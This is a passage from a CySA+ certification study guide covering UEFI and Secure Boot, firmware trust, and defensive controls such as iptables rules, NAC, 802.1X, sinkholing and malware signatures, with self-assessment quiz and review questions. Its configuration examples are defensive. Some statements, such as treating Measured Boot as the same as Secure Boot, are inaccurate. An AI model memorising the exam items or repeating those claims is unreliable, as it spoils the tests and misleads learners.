BIOS. BIOS uses the master boot record (MBR) to save
information about the hard drive data, while UEFI uses
the GUID partition table (GPT). An MBR disk is limited to a maximum of four primary partitions, each no larger than 2 terabytes (TB). UEFI allows up to 128 partitions, with the total
disk limit being 9.4 zettabytes (ZB) or 9.4 billion
terabytes. UEFI is also faster and more secure than
traditional BIOS. UEFI Secure Boot requires boot
loaders to have a digital signature.
UEFI is an open standard interface layer between the
firmware and the operating system that requires
firmware updates to be digitally signed. Security
professionals should understand the following points
regarding UEFI:
• Designed as a replacement for traditional PC
BIOS.
• Additional functionality includes support for
Secure Boot, network authentication, and
universal graphics drivers.
• Protects against BIOS malware attacks including
rootkits.
• Secure Boot requires that all boot loader components (e.g., OS kernel, drivers) attest to their identity (digital signature), and the attestation is compared to the trusted list. (More on Secure Boot, Measured Boot, and attestation appears later in the “Measured Boot and Attestation” section.)
• When a computer is manufactured, a list of keys
that identify trusted hardware, firmware, and
operating system loader code (and in some
instances, known malware) is embedded in the
UEFI.
• Ensures the integrity and security of the firmware.
• Prevents malicious files from being loaded.
• Can be disabled for backward compatibility.
UEFI operates between the OS layer and the firmware
layer, as shown in Figure 10-3.
Figure 10-3 UEFI
TRUSTED FOUNDRY
You must be concerned with the safety and the integrity
of the hardware that you purchase. The following are
some of the methods used to provide this assurance:
• Trusted Foundry: The Trusted Foundry
program can help you exercise care in ensuring
the authenticity and integrity of the components
of hardware purchased from a vendor. This U.S.
Department of Defense (DoD) program identifies
“trusted vendors” and ensures a “trusted supply
chain.” A trusted supply chain begins with trusted
design and continues with trusted mask, foundry,
packaging/assembly, and test services. It ensures
that systems have access to leading-edge
integrated circuits from secure, domestic sources.
At the time of this writing, 77 vendors have been
certified as trusted.
• Source authenticity of hardware: When
purchasing hardware to support any network or
security solution, a security professional must
ensure that the hardware’s authenticity can be
verified. Just as expensive consumer items such as
purses and watches can be counterfeited, so can
network equipment. While the dangers with
counterfeit consumer items are typically confined
to a lack of authenticity and potentially lower
quality, the dangers presented by counterfeit
network gear can extend to the presence of
backdoors in the software or firmware. Always
purchase equipment directly from the
manufacturer when possible, and when
purchasing from resellers, use caution and insist
on a certificate of authenticity. In any case where
the price seems too good to be true, keep in mind
that it may be an indication the gear is not
authentic.
• OEM documentation: One of the ways you can
reduce the likelihood of purchasing counterfeit
equipment is to insist on the inclusion of
verifiable original equipment manufacturer
(OEM) documentation. In many cases, this
paperwork includes anti-counterfeiting features.
Make sure to use the vendor website to verify all
the various identifying numbers in the
documentation.
SECURE PROCESSING
Secure processing is a concept that encompasses a variety of technologies used to prevent any insecure actions on the part of the CPU or processor. In some
cases these technologies involve securing the actions of
the processor itself, while other approaches tackle the
issue where the data is stored. This section introduces
some of these technologies and approaches.
Trusted Execution
Trusted Execution (TE) is a collection of features that
is used to verify the integrity of the system and
implement security policies, which together can be used
to enhance the trust level of the complete system. An
example is the Intel Trusted Execution Technology (Intel
TXT). This approach is shown in Figure 10-4.
Figure 10-4 Intel Trusted Execution Technology
Secure Enclave
A secure enclave is a part of an operating system that
cannot be compromised even when the operating system
kernel is compromised, because the enclave has its own
CPU and is separated from the rest of the system. This
means security functions remain intact even when
someone has gained control of the OS. Secure enclaves
are a relatively recent technology being developed to
provide additional security. Cisco, Microsoft, and Apple
all have implementations of secure enclaves that differ in
implementation but all share the same goal of creating
an area that cannot be compromised even when the OS
is.
Processor Security Extensions
Processor security extensions are sets of security-related instruction codes that are built into some modern
CPUs. An example is Intel Software Guard Extensions
(Intel SGX). It defines private regions of memory, called
enclaves, whose contents are protected and unable to be
either read or saved by any process outside the enclave
itself, including processes running at higher privilege
levels.
Another processor security technique is the use of the
NX and XN bits. These bits are related to processors.
Their respective meanings are as follows:
• NX (no-execute) bit: Technology used in CPUs
to segregate areas of memory for use by either
storage of processor instructions (code) or storage
of data
• XN (never execute) bit: Method for specifying
areas of memory that cannot be used for execution
When these bits are available in the architecture of the
system, they can be used to protect sensitive information
from memory attacks. By utilizing the capability of the
NX bit to segregate memory into areas where storage of
processor instructions (code) and storage of data are
kept separate, many attacks can be prevented. Also, the
capability of the XN bit to mark certain areas of memory
that are off-limits to execution of code can prevent other
memory attacks as well.
Atomic Execution
Atomic execution in concurrent programming refers to program operations that run independently of any other processes (threads). Making an operation atomic
consists of using synchronization mechanisms to make
sure that the operation is seen, from any other thread, as
a single, atomic operation. This increases security by
preventing one thread from viewing the state of the data
when the first thread is still in the middle of the
operation. Atomicity also means that the operation of the
thread is either completely finished or is rolled back to
its initial state (there’s no such thing as partially done).
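A short Python illustration of the idea, using a lock as the synchronization mechanism; the counter update is the operation being made atomic:

import threading

balance = 0
lock = threading.Lock()

def deposit(amount, times):
    global balance
    for _ in range(times):
        with lock:             # no other thread can observe a half-finished update
            balance += amount  # the read-modify-write completes as a single step

threads = [threading.Thread(target=deposit, args=(1, 100_000)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(balance)  # always 400000 with the lock; without it, results vary run to run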
ANTI-TAMPER
Anti-tamper technology is designed to prevent
access to sensitive information and encryption keys on a
device. Anti-tamper processors, for example, store and
process private or sensitive information, such as private
keys or electronic money credit. The chips are designed
so that the information is not accessible through external
means and can be accessed only by the embedded
software, which should contain the appropriate security
measures, such as required authentication credentials.
Some of these chips take a different approach and zero
out the sensitive data if they detect penetration of their
security, and some can even do this with no power.
It also should not be possible for unauthorized persons
to access and change the configuration of any devices.
This means additional measures should be followed to
prevent this. Tampering includes defacing, damaging, or
changing the configuration of a device. Integrity
verification programs should be used by applications to
look for evidence of data tampering, errors, and
omissions.
SELF-ENCRYPTING DRIVES
Self-encrypting drives do exactly as the name
implies: they encrypt themselves without any user
intervention. The process is so transparent to the user
that the user may not even be aware the encryption is
occurring. It uses a unique and random data encryption
key (DEK). When data is written to the drive, it is
encrypted, and when the data is read from the drive, it is
decrypted, as shown in Figure 10-5.
Figure 10-5 Self-encrypting drive
TRUSTED FIRMWARE
UPDATES
Hardware and firmware vulnerabilities are expected to
become an increasing target for sophisticated attackers.
While typically only successful when mounted by the
skilled hands of a nation-state or advanced persistent
threat (APT) group, an attack on hardware and firmware
can be devastating because this firmware forms the
platform for the entire device.
Firmware includes any type of instructions stored in
non-volatile memory devices such as read-only memory (ROM), electrically erasable programmable read-only memory (EEPROM), or flash memory. BIOS and UEFI code are the most common examples of firmware.
Computer BIOS doesn’t go bad; however, it can become
out of date or contain bugs. In the case of a bug, an
upgrade will correct the problem. An upgrade may also
be indicated when the BIOS doesn’t support some
component that you would like to install, such as a larger
hard drive or a different type of processor.
Today’s BIOS is typically written to an EEPROM chip
and can be updated through the use of software. Each
manufacturer has its own method for accomplishing this.
Check out the manufacturer’s documentation for
complete details. Regardless of the exact procedure used,
the update process is referred to as flashing the BIOS. It
means the old instructions are erased from the EEPROM
chip, and the new instructions are written to the chip.
Firmware can be updated by using an update utility from
the motherboard vendor. In many cases, the steps are as follows:
Step 1. Download the update file to a flash drive.
Step 2. Insert the flash drive and reboot the
machine.
Step 3. Use the specified key sequence to enter the
UEFI/BIOS setup.
Step 4. If necessary, disable Secure Boot.
Step 5. Save the changes and reboot again.
Step 6. Re-enter the CMOS settings.
Step 7. Choose the boot options and boot from the
flash drive.
Step 8. Follow the specific directions with the
update to locate the upgrade file on the flash
drive.
Step 9. Execute the file (usually by typing flash).
Step 10. While the update is completing, ensure that
you maintain power to the device.
The key to trusted firmware updates is contained in Step
1. Only obtain firmware updates from the vendor
directly. Never use a third-party facilitator for this. Also
make sure you verify the hash value that comes along
with the update to ensure that it has not been altered
since its creation.
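Verifying that hash can be as simple as the following sketch, assuming the vendor publishes a SHA-256 value in a sidecar file alongside the image; both filenames are hypothetical:

import hashlib

def file_sha256(path, chunk_size=65536):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)  # hash the file in chunks to limit memory use
    return digest.hexdigest()

# Hypothetical sidecar file published by the vendor: "<hex digest>  firmware_update.bin"
published = open("firmware_update.bin.sha256").read().split()[0].lower()

if file_sha256("firmware_update.bin") == published:
    print("Hash matches the vendor's published value; safe to flash.")
else:
    print("Hash mismatch; do NOT install this image.")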
MEASURED BOOT AND
ATTESTATION
Attestation is the process of ensuring, or attesting to the fact, that a piece of software or firmware has integrity, meaning that it has not been altered from its original state. It is
used in several boot methods to check all elements used
in the boot process to ensure that malware has not
altered the files or introduced new files into the process.
Let’s look at some of these Secure Boot methods.
Measured Boot, also known as Secure Boot, is a term
that applies to several technologies that follow the Secure
Boot standard. Its implementations include Windows
Secure Boot, measured launch, and Integrity
Measurement Architecture (IMA). Figure 10-6 shows the
three main actions related to Secure Boot in Windows,
which are described in the following list:
Figure 10-6 Secure Boot
1. The firmware verifies all UEFI executable files and
the OS loader to be sure they are trusted.
2. Windows boot components verify the signature on
each component to be loaded. Any untrusted
components are not loaded and trigger
remediation.
3. The signatures on all boot-critical drivers are
checked as part of Secure Boot verification in
Winload (Windows Boot Loader) and by the Early
Launch Anti-Malware driver.
The disadvantage is that systems that ship with UEFI Secure Boot enabled do not, by default, allow the installation of an operating system whose loader is not signed by a trusted key. This prevents installing other operating systems or running live Linux media unless Secure Boot is disabled.
Measured Launch
A measured launch is a launch in which the software and
platform components have been identified, or
“measured,” using cryptographic techniques. The
resulting values are used at each boot to verify trust in
those components. A measured launch is designed to
prevent attacks on these components (system and BIOS
code) or at least to identify when these components have
been compromised. It is part of Intel TXT. TXT
functionality is leveraged by software vendors including
HyTrust, PrivateCore, Citrix, and VMware.
An application of measured launch is Measured Boot by
Microsoft in Windows 10 and Windows Server 2019. It
creates a detailed log of all components that loaded
before the anti-malware driver. This log can be used to both
identify malware on the computer and maintain evidence
of boot component tampering. One possible
disadvantage of measured launch is potential slowing of
the boot process.
Integrity Measurement Architecture
Another approach that attempts to create and measure
the runtime environment is an open source trusted
computing component called Integrity Measurement
Architecture (IMA), mentioned earlier in this chapter.
IMA creates a list of components and anchors the list to
the TPM chip. It can use the list to attest to the system’s
runtime integrity.
BUS ENCRYPTION
The CPU is connected to an address bus. Memory and
I/O devices recognize this address bus. These devices can
then communicate with the CPU, read requested data,
and send it to the data bus. Bus encryption protects
the data traversing these buses. Bus encryption is used
by newer Microsoft operating systems to protect
certificates, BIOS, passwords, and program authenticity.
Bus encryption is necessary not only to prevent tampering with encrypted instructions that may be easily discovered on a data bus or during data transmission,
but also to prevent discovery of decrypted instructions
that may reveal security weaknesses that an intruder can
exploit.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 10-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 10-2 Key Topics in Chapter 10
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Roots of Trust (RoTs)
Trusted Platform Module (TPM)
virtual TPM (VTPM)
hardware security module (HSM)
microSD HSM
eFuse
Unified Extensible Firmware Interface (UEFI)
Secure Boot
attestation
Trusted Foundry
secure processing
Trusted Execution
secure enclave
processor security extensions
atomic execution
anti-tamper technology
self-encrypting drives
attestation
Measured Boot
bus encryption
REVIEW QUESTIONS
1. RoTs need to be exposed by the operating system to
applications through an open ___________.
2. List at least one of the contents of a TPM chip.
3. Match the following terms with their definitions.
4. _______________ requires that all boot loader
components (e.g., OS kernel, drivers) attest to their
identity (digital signature) and the attestation is
compared to the trusted list.
5. List the Intel example of the implementation of
processor security extensions.
6. Match the following terms with their definitions.
7. _____________ creates a list of components and
anchors the list to the TPM chip. It can use the list
to attest to the system’s runtime integrity.
8. What is the disadvantage of systems that ship with
UEFI Secure Boot enabled?
9. Match the following terms with their definitions.
10. The traditional BIOS has been replaced with the
____________________.
Chapter 11. Analyzing
Data as Part of Security
Monitoring Activities [This
content is currently in
development.]
This content is currently in development.
Chapter 12. Implementing
Configuration Changes to
Existing Controls to
Improve Security
This chapter covers the following topics related to
Objective 3.2 (Given a scenario, implement configuration
changes to existing controls to improve security) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Permissions: Discusses the importance of
proper permissions management
• Whitelisting: Covers the process of whitelisting
and its indications
• Blacklisting: Describes a blacklisting process
used to deny access
• Firewall: Identifies key capabilities of various
firewall platforms
• Intrusion prevention system (IPS) rules:
Discusses rules used to automate response
• Data loss prevention (DLP): Covers the DLP
process used to prevent exfiltration
• Endpoint detection and response (EDR):
Describes a technology that addresses the need for
continuous monitoring
• Network access control (NAC): Identifies the
processes used by NAC technology
• Sinkholing: Discusses the use of this networking
tool
• Malware signatures: Describes the importance
of malware signature and development/rule
writing
• Sandboxing: Reviews the use of this software
virtualization technique to isolate apps from
critical system resources
• Port Security: Covers the role of port security in
preventing attacks
In many cases, security monitoring data indicates a need
to change or implement new controls to address new
threats. These changes might be small configuration
adjustments to a security device or they might include
large investments in new technology. Regardless of the
scope, these actions should be driven by the threat at
hand and the controls should be exposed to the same
cost/benefit analysis to which all organizational activities
are exposed.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 12 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 12-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 12-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is an example of a right and
not a permission?
a. Read access to a file
b. Ability to delete a file
c. Ability to reset passwords
d. Ability to change the permissions of a file
2. When you allow a file type at the exclusion of all
other file types, you have created what?
a. Whitelist
b. Access list
c. Blacklist
d. Graylist
3. Which of the following requires the most effort to
maintain?
a. Whitelist
b. Access list
c. Blacklist
d. Graylist
4. Which of the following is a category of devices that
attempt to address traffic inspection and
application awareness shortcomings of a
traditional stateful firewall?
a. NGFW
b. Bastion host
c. Three-legged firewall
d. Proxy
5. Which of the following is a type of IPS and is an
expert system that uses a knowledge base, an
inference engine, and programming?
a. Rule-based
b. Signature-based
c. Heuristics-based
d. Error-based
6. Preventing data exfiltration is the role of which of
the following?
a. Trend analysis
b. DLP
c. NAC
d. Port security
7. Which of the following shifts security from a
reactive threat approach to one that can detect and
prevent threats before they reach the organization?
a. NAC
b. DAC
c. EDR
d. DLP
8. Which of the following is a service that goes beyond
authentication of the user and includes
examination of the state of the computer the user is
introducing to the network when making a remote-access or VPN connection to the network?
a. NAC
b. DAC
c. EDR
d. DLP
9. Which of the following can be used to prevent a
compromised host from communicating back to
the attacker?
a. Sinkholing
b. DNSSec
c. NASC
d. Port security
10. Which of the following could be a filename or could
be some series of characters that can be tied
uniquely to the malware?
a. Key
b. Signature
c. Fingerprint
d. Scope
11. Which of the following allows you to run a possibly
malicious program in a safe environment so that it
doesn’t infect the local system?
a. Sandbox
b. Secure memory
c. Secure enclave
d. Container
12. Which of the following is referred to as Layer 2
security?
a. Sandbox
b. Port security
c. Encoding
d. Subnetting
FOUNDATION TOPICS
PERMISSIONS
Permissions are granted or denied at the file, folder, or
other object level. Common permission types include
Read, Write, and Full Control. Data custodians or
administrators will grant users permissions on a file or
folder based on the file owner’s request to do so.
Rights allow administrators to assign specific privileges
and logon rights to groups or users. Rights manage who
is allowed to perform certain operations on an entire
computer or within a domain, rather than on a particular
object within a computer. While user permissions are
granted by an object’s owner, user rights are assigned
using a computer’s local security policy or a domain
security policy. User rights apply to user accounts, while
permissions apply to objects.
Rights include the ability to log on to a system
interactively, which is a logon right, or the ability to back
up files, which is considered a privilege. User rights are
divided into two categories: privileges and logon rights.
Privileges are the right of an account, such as a user or
group account, to perform various system-related
operations on the local computer, such as shutting down
the system, loading device drivers, or changing the
system time. Logon rights control how users are allowed
access to the computer, including logging on locally or
through a network connection or whether as a service or
as a batch job.
Conflicts can occur in situations where the rights that are
required to administer a system overlap the rights of
resource ownership. When rights and permissions conflict, a privilege
overrides a permission.
Many times an attacker compromises a device by altering
the permissions, either in the local database or in entries
related to the device in the directory service server. All
permissions should undergo a review to ensure that all
are in the appropriate state. The appropriate state may
not be the state they were in before the event. Sometimes
you may discover that although permissions were not set
in a dangerous way prior to an event, they are not
correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You
should also make changes to the permissions based on
lessons learned during an event. In that case, ensure that
the new settings undergo a change control review and
that any approved changes are reflected in the
configuration database.
WHITELISTING AND
BLACKLISTING
Whitelisting occurs when a list of acceptable e-mail
addresses, Internet addresses, websites, applications, or
some other identifier is configured as good senders or as
allowed to send. Blacklisting identifies bad senders.
Graylisting is somewhere in between the two, listing
entities that cannot be identified as whitelist or blacklist
items. In the case of graylisting, the new entity must pass
through a series of tests to determine whether it will be
whitelisted or blacklisted. Whitelisting, blacklisting, and
graylisting are commonly used with spam filtering tools.
But there are other uses for whitelists and blacklists as well. They are used in routers to enforce ACLs and in switches to enforce port security.
Application Whitelisting and
Blacklisting
Application whitelists are lists of allowed applications
(with all others excluded), and blacklists are lists of
prohibited applications (with all others allowed). It is
important to control the types of applications that users
can install on their computers. Some application types
can create support issues, and others can introduce
malware. It is possible to use Windows Group Policy to
restrict the installation of software on network
computers, as illustrated in Figure 12-1. Using Windows
Group Policy is only one option, and each organization
should select a technology to control application
installation and usage in the network.
Figure 12-1 Software Restrictions
Input Validation
Input validation is the process of checking all input for
things such as proper format and proper length. In many
cases, these validators use either the blacklisting of
characters or patterns or the whitelisting of characters or
patterns. Blacklisting looks for characters or patterns to
block. It can prevent legitimate requests. Whitelisting
looks for allowable characters or patterns and only
allows those. The length of the input should also be
checked and verified to prevent buffer overflows.
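A whitelisting validator is often just a strict pattern plus a length check. Here is a minimal sketch; the allowed character set and length limit are illustrative choices, not a universal rule:

import re

# Whitelist: letters, digits, dot, hyphen, and underscore; 1 to 64 characters total
ALLOWED = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

def is_valid_input(value: str) -> bool:
    return bool(ALLOWED.fullmatch(value))

print(is_valid_input("backup-2024.cfg"))       # True: every character is on the whitelist
print(is_valid_input("a" * 500))               # False: fails the length check
print(is_valid_input("name'; DROP TABLE x"))   # False: quote, space, and ; are not allowed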
FIREWALL
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” discussed firewall logs and
Chapter 8, “Security Solutions for Infrastructure
Management,” discussed the various architectures used
in firewalls; at this point we need to look a little more
closely at firewall types and their placement for effective
operation. Firewalls can be software programs that are
installed over server or client operating systems or
appliances that have their own operating system. In
either case, the job of a firewall is to inspect and control
the type of traffic allowed.
NextGen Firewalls
Next-generation firewalls (NGFWs) are a category
of devices that attempt to address traffic inspection and
application awareness shortcomings of a traditional
stateful firewall, without hampering the performance.
Although unified threat management (UTM) devices also
attempt to address these issues, they tend to use separate
internal engines to perform individual security functions.
This means a packet may be examined several times by
different engines to determine whether it should be
allowed into the network.
NGFWs are application aware, which means they can
distinguish between specific applications instead of
allowing all traffic coming in via typical web ports.
Moreover, they examine packets only once, during the
deep packet inspection phase (which is required to detect
malware and anomalies). The following are some of the
features provided by NGFWs:
• Nondisruptive inline configuration (which has
little impact on network performance)
• Standard first-generation firewall capabilities,
such as network address translation (NAT),
stateful protocol inspection (SPI), and virtual
private networking
• Integrated signature-based IPS engine
• Application awareness, full stack visibility, and
granular control
• Ability to incorporate information from outside
the firewall, such as directory-based policy,
blacklists, and whitelists
• Upgrade path to include future information feeds
and security threats and SSL/TLS decryption to
enable identifying undesirable encrypted
applications
An NGFW can be placed inline or out-of-path. Out-of-path means that a gateway redirects traffic to the NGFW,
while inline placement causes all traffic to flow through
the device. Figure 12-2 shows the two placement options
for NGFWs.
Figure 12-2 Placement of an NGFW
Table 12-2 lists the advantages and disadvantages of
NGFWs.
Table 12-2 Advantages and Disadvantages of
NGFWs
Host-Based Firewalls
A host-based firewall resides on a single host and is
designed to protect that host only. Many operating
systems today come with host-based (or personal)
firewalls. Many commercial host-based firewalls are
designed to focus attention on a particular type of traffic
or to protect a certain application.
On Linux-based systems, a common host-based firewall
is iptables, which replaces a previous package called
ipchains. It has the ability to accept or drop packets. You
create firewall rules much as you create an access list on
a router. The following is an example of a rule set:
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
iptables -A INPUT -i eth1 -s 172.16.0.0/12 -j DROP
This rule set blocks all incoming traffic on eth1 sourced
from the 192.168.0.0/24, 10.0.0.0/8, or 172.16.0.0/12
network. All three of these are private IP address ranges. It is
quite common to block incoming traffic from the
Internet that has a private IP address as its source, as
this usually indicates that IP spoofing is occurring. In
general, the following IP address ranges should be
blocked as traffic sourced from these ranges is highly
likely to be spoofed:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
224.0.0.0/4
240.0.0.0/5
127.0.0.0/8
The 224.0.0.0/4 range covers multicast traffic, and the
127.0.0.0/8 range covers traffic from a loopback IP
address. You may also want to include the APIPA range,
169.254.0.0/16, as it is the range in which some
computers give themselves IP addresses when the
DHCP server cannot be reached. On a Microsoft
computer, you can use Windows Defender Firewall to block these
ranges.
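Extending the earlier iptables example (a sketch that assumes the same eth1 ingress interface), the full list of ranges could be dropped as follows:

iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
iptables -A INPUT -i eth1 -s 172.16.0.0/12 -j DROP
iptables -A INPUT -i eth1 -s 192.168.0.0/16 -j DROP
iptables -A INPUT -i eth1 -s 224.0.0.0/4 -j DROP
iptables -A INPUT -i eth1 -s 240.0.0.0/5 -j DROP
iptables -A INPUT -i eth1 -s 127.0.0.0/8 -j DROP
iptables -A INPUT -i eth1 -s 169.254.0.0/16 -j DROP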
Table 12-3 lists the pros and cons of the various types of
firewalls.
Table 12-3 Pros and Cons of Firewall Types
Note
Other firewalls and associated network architecture approaches were covered
in Chapter 8.
INTRUSION PREVENTION
SYSTEM (IPS) RULES
As you learned earlier, some IPSs can be rule-based.
Chapter 3, “Vulnerability Management Activities,” and
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” covered these IPSs in more detail.
Chapter 11 covered rule writing in more detail.
DATA LOSS PREVENTION
(DLP)
Data loss prevention (DLP) software attempts to
prevent data leakage. It does this by maintaining
awareness of actions that can and cannot be taken with
respect to a document. For example, DLP software might
allow printing of a document but only at the company
office. It might also disallow sending the document
through e-mail. DLP software uses ingress and egress
filters to identify sensitive data that is leaving the
organization and can prevent such leakage. Another
scenario might be the release of product plans that
should be available only to the Sales group. You could set
the following policy for that document:
• It cannot be e-mailed to anyone other than Sales
group members.
• It cannot be printed.
• It cannot be copied.
There are two locations where you can implement this
policy:
• Network DLP: Installed at network egress points
near the perimeter, network DLP analyzes
network traffic.
• Endpoint DLP: Endpoint DLP runs on end-user
workstations or servers in the organization.
You can use both precise and imprecise methods to
determine what is sensitive:
• Precise methods: These methods involve
content registration and trigger almost zero false-
positive incidents.
• Imprecise methods: These methods can
include keywords, lexicons, regular expressions,
extended regular expressions, metadata tags,
Bayesian analysis, and statistical analysis.
The value of a DLP system resides in the level of
precision with which it can locate and prevent the
leakage of sensitive data.
ENDPOINT DETECTION AND
RESPONSE (EDR)
Endpoint detection and response (EDR) is a
proactive endpoint security approach designed to
supplement existing defenses. This advanced endpoint
approach shifts security from a reactive threat approach
to one that can detect and prevent threats before they
reach the organization. It focuses on three essential
elements for effective threat prevention: automation,
adaptability, and continuous monitoring.
The following are some examples of EDR products:
• FireEye Endpoint Security
• Carbon Black CB Response
• Guidance Software EnCase Endpoint Security
• Cybereason Total Enterprise Protection
• Symantec Endpoint Protection
• RSA NetWitness Endpoint
The advantage of EDR systems is that they provide
continuous monitoring. The disadvantage is that the
software’s use of resources could impact performance of
the device.
NETWORK ACCESS
CONTROL (NAC)
Network access control (NAC) is a service that goes
beyond authentication of the user and includes
examination of the state of the computer the user is
introducing to the network when making a remote-access or VPN connection.
The Cisco world calls these services Network Admission
Control (NAC), and the Microsoft world calls them
Network Access Protection (NAP). Regardless of the
term used, the goals of the features are the same: to
examine all devices requesting network access for
malware, missing security updates, and any other
security issues the devices could potentially introduce to
the network.
Figure 12-3 shows the steps that occur in Microsoft NAP.
The health state of the device requesting access is
collected and sent to the Network Policy Server (NPS),
where the state is compared to requirements. If
requirements are met, access is granted.
Figure 12-3 NAC
The limitations of using NAC and NAP are as follows:
• They work well for company-managed computers
but less well for guests.
• They tend to react only to known threats and not
to new threats.
• The return on investment is still unproven.
• Some implementations involve confusing
configuration.
Access decisions can be of the following types:
• Time based: A user might be allowed to connect
to the network only during specific times of day.
• Rule based: A user might have his access
controlled by a rule such as “all devices must have
the latest antivirus patches installed.”
• Role based: A user may derive her network
access privileges from a role she has been
assigned, typically through addition to a specific
security group.
• Location based: A user might have one set of
access rights when connected from another office
and another set when connected from the
Internet.
Quarantine/Remediation
If you examine step 5 in the process shown in Figure 12-3, you see that a device that fails examination is placed in
a restricted network until it can be remediated. A
remediation server addresses the problems discovered
on the device. It may remove the malware, install
missing operating system updates, or update virus
definitions. When the remediation process is complete,
the device is granted full access to the network.
Agent-Based vs. Agentless NAC
NAC can be deployed with or without agents on devices.
An agent is software used to control and interact with a
device. Agentless NAC is the easiest to deploy but offers
less control and fewer inspection capabilities. Agent-based NAC can perform deep inspection and remediation
at the expense of additional software on the endpoint.
Both agent-based and agentless NAC can be used to
mitigate the following issues:
• Malware
• Missing OS patches
• Missing anti-malware updates
802.1X
Another form of network access control is 802.1X
Extensible Authentication Protocol (EAP). 802.1X is a
standard that defines a framework for centralized
port-based authentication. It can be applied to both wireless
and wired networks and uses three components:
• Supplicant: The user or device requesting access
to the network
• Authenticator: The device through which the
supplicant is attempting to access the network
• Authentication server: The centralized device
that performs authentication
The role of the authenticator can be performed by a wide
variety of network access devices, including remote-access servers (both dial-up and VPN), switches, and
wireless access points. The role of the authentication
server can be performed by a Remote Authentication
Dial-in User Service (RADIUS) or Terminal Access
Controller Access Control System Plus (TACACS+)
server. The authenticator requests credentials from the
supplicant and, upon receipt of those credentials, relays
them to the authentication server, where they are
validated. Upon successful verification, the authenticator
is notified to open the port for the supplicant to allow
network access. Figure 12-4 illustrates this process.
Figure 12-4 802.1X Architecture
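As a minimal, hedged sketch (exact commands vary by platform and IOS version; the server address and key are hypothetical), enabling 802.1X on a Cisco switch so the switch acts as the authenticator might look like this:

! Define a RADIUS authentication server (address and key are examples)
radius-server host 10.1.1.50 key ExampleSharedSecret
aaa new-model
aaa authentication dot1x default group radius
! Globally enable 802.1X, then enforce it on the access port
dot1x system-auth-control
interface fa0/1
 switchport mode access
 dot1x port-control auto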
While RADIUS and TACACS+ perform the same roles,
they have different characteristics. These differences
must be taken into consideration when choosing a
method. Keep in mind also that while RADIUS is a
standard, TACACS+ is Cisco proprietary. Table 12-4
compares them.
Table 12-4 RADIUS vs. TACACS+
Among the issues 802.1X port-based authentication can
help mitigate are the following:
• Network DoS attacks
• Device spoofing (because it authenticates the user, not the device)
SINKHOLING
A sinkhole is a router designed to accept and analyze
attack traffic. Sinkholes can be used to do the following:
• Draw traffic away from a target
• Monitor worm traffic
• Monitor other malicious traffic
During an attack, a sinkhole router can be quickly
configured to announce a route to the target’s IP address
that leads to a network or an alternate device where the
attack can be safely studied. Moreover, sinkholes can
also be used to prevent a compromised host from
communicating back to the attacker. Finally, they can be
used to prevent a worm-infected system from infecting
other systems. Sinkholes can be used to mitigate the
following issues:
• Worms
• Compromised devices communicating with
command and control (C&C) servers
• External attacks targeted at a single device inside
the network
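As a simple sketch of the routing side (the addresses are hypothetical), a router can sinkhole traffic destined for a targeted host either by pointing a host route at a sinkhole analysis device or by discarding the traffic outright with a null route:

! Send traffic for the targeted host 203.0.113.10 to a sinkhole analyzer ...
ip route 203.0.113.10 255.255.255.255 192.0.2.99
! ... or, alternatively, silently discard it at this router:
! ip route 203.0.113.10 255.255.255.255 Null0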
MALWARE SIGNATURES
While placing malware in a sandbox or isolation area for
study is a safe way of reverse engineering and eventually
disarming the malware, the best defense is to identify
and remove malware when it enters the network before it
infects the devices.
To do this, network security devices such as SIEM, IPS,
IDS, and firewall systems must be able to recognize the
malware when it is still contained in network packets
before it reaches devices. This requires identifying a
malware signature. This could be a filename or it could
be some series of characters that can be tied uniquely to
the malware.
You learned about signature-based IPS/IDS systems
earlier. You may remember that these systems and rule-based systems both rely on rules that instruct the
security device to be on the lookout for certain character
strings in a packet.
Development/Rule Writing
One of the keys to successful signature matching and
therefore successful malware prevention is proper rule
writing, which is in the development realm. Just as
automation is driving network technicians to learn basic
development theory and rule writing, so is malware
signature identification. Rule creation does not always
rely on the name of the malicious file. It also can be
based on behavior that is dangerous in and of itself.
Examples of rules or behavior that can indicate that a
system is infected by malware are as follows:
• A system process that drops various malware
executables (e.g., Dropper, a kind of Trojan that
has been designed to “install” some sort of
malware)
• A system process that reaches out to random, and
often foreign, IP addresses/domains
• Repeated attempts to monitor or modify key
system settings such as registry keys
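To make rule writing concrete, here is a minimal Snort-style signature sketch (the message text, ports, and SID are hypothetical). It alerts on inbound payloads beginning with the "MZ" header that starts Windows executable files, a crude indicator of an executable download:

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible executable download"; content:"MZ"; depth:2; sid:1000001; rev:1;)

Production rules add qualifiers such as flow direction and service, but the structure (a rule header followed by rule options) is the same.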
SANDBOXING
Chapter 11 briefly introduced sandboxing. You can use a
sandbox to run a possibly malicious program in a safe
environment so that it doesn’t infect the local system.
By using sandboxing tools, you can execute malware
executable files without allowing the files to interact with
the local system. Some sandboxing tools also allow you
to analyze the characteristics of an executable. This is not
possible with some malware because it is specifically
written to do different things if it detects that it’s being
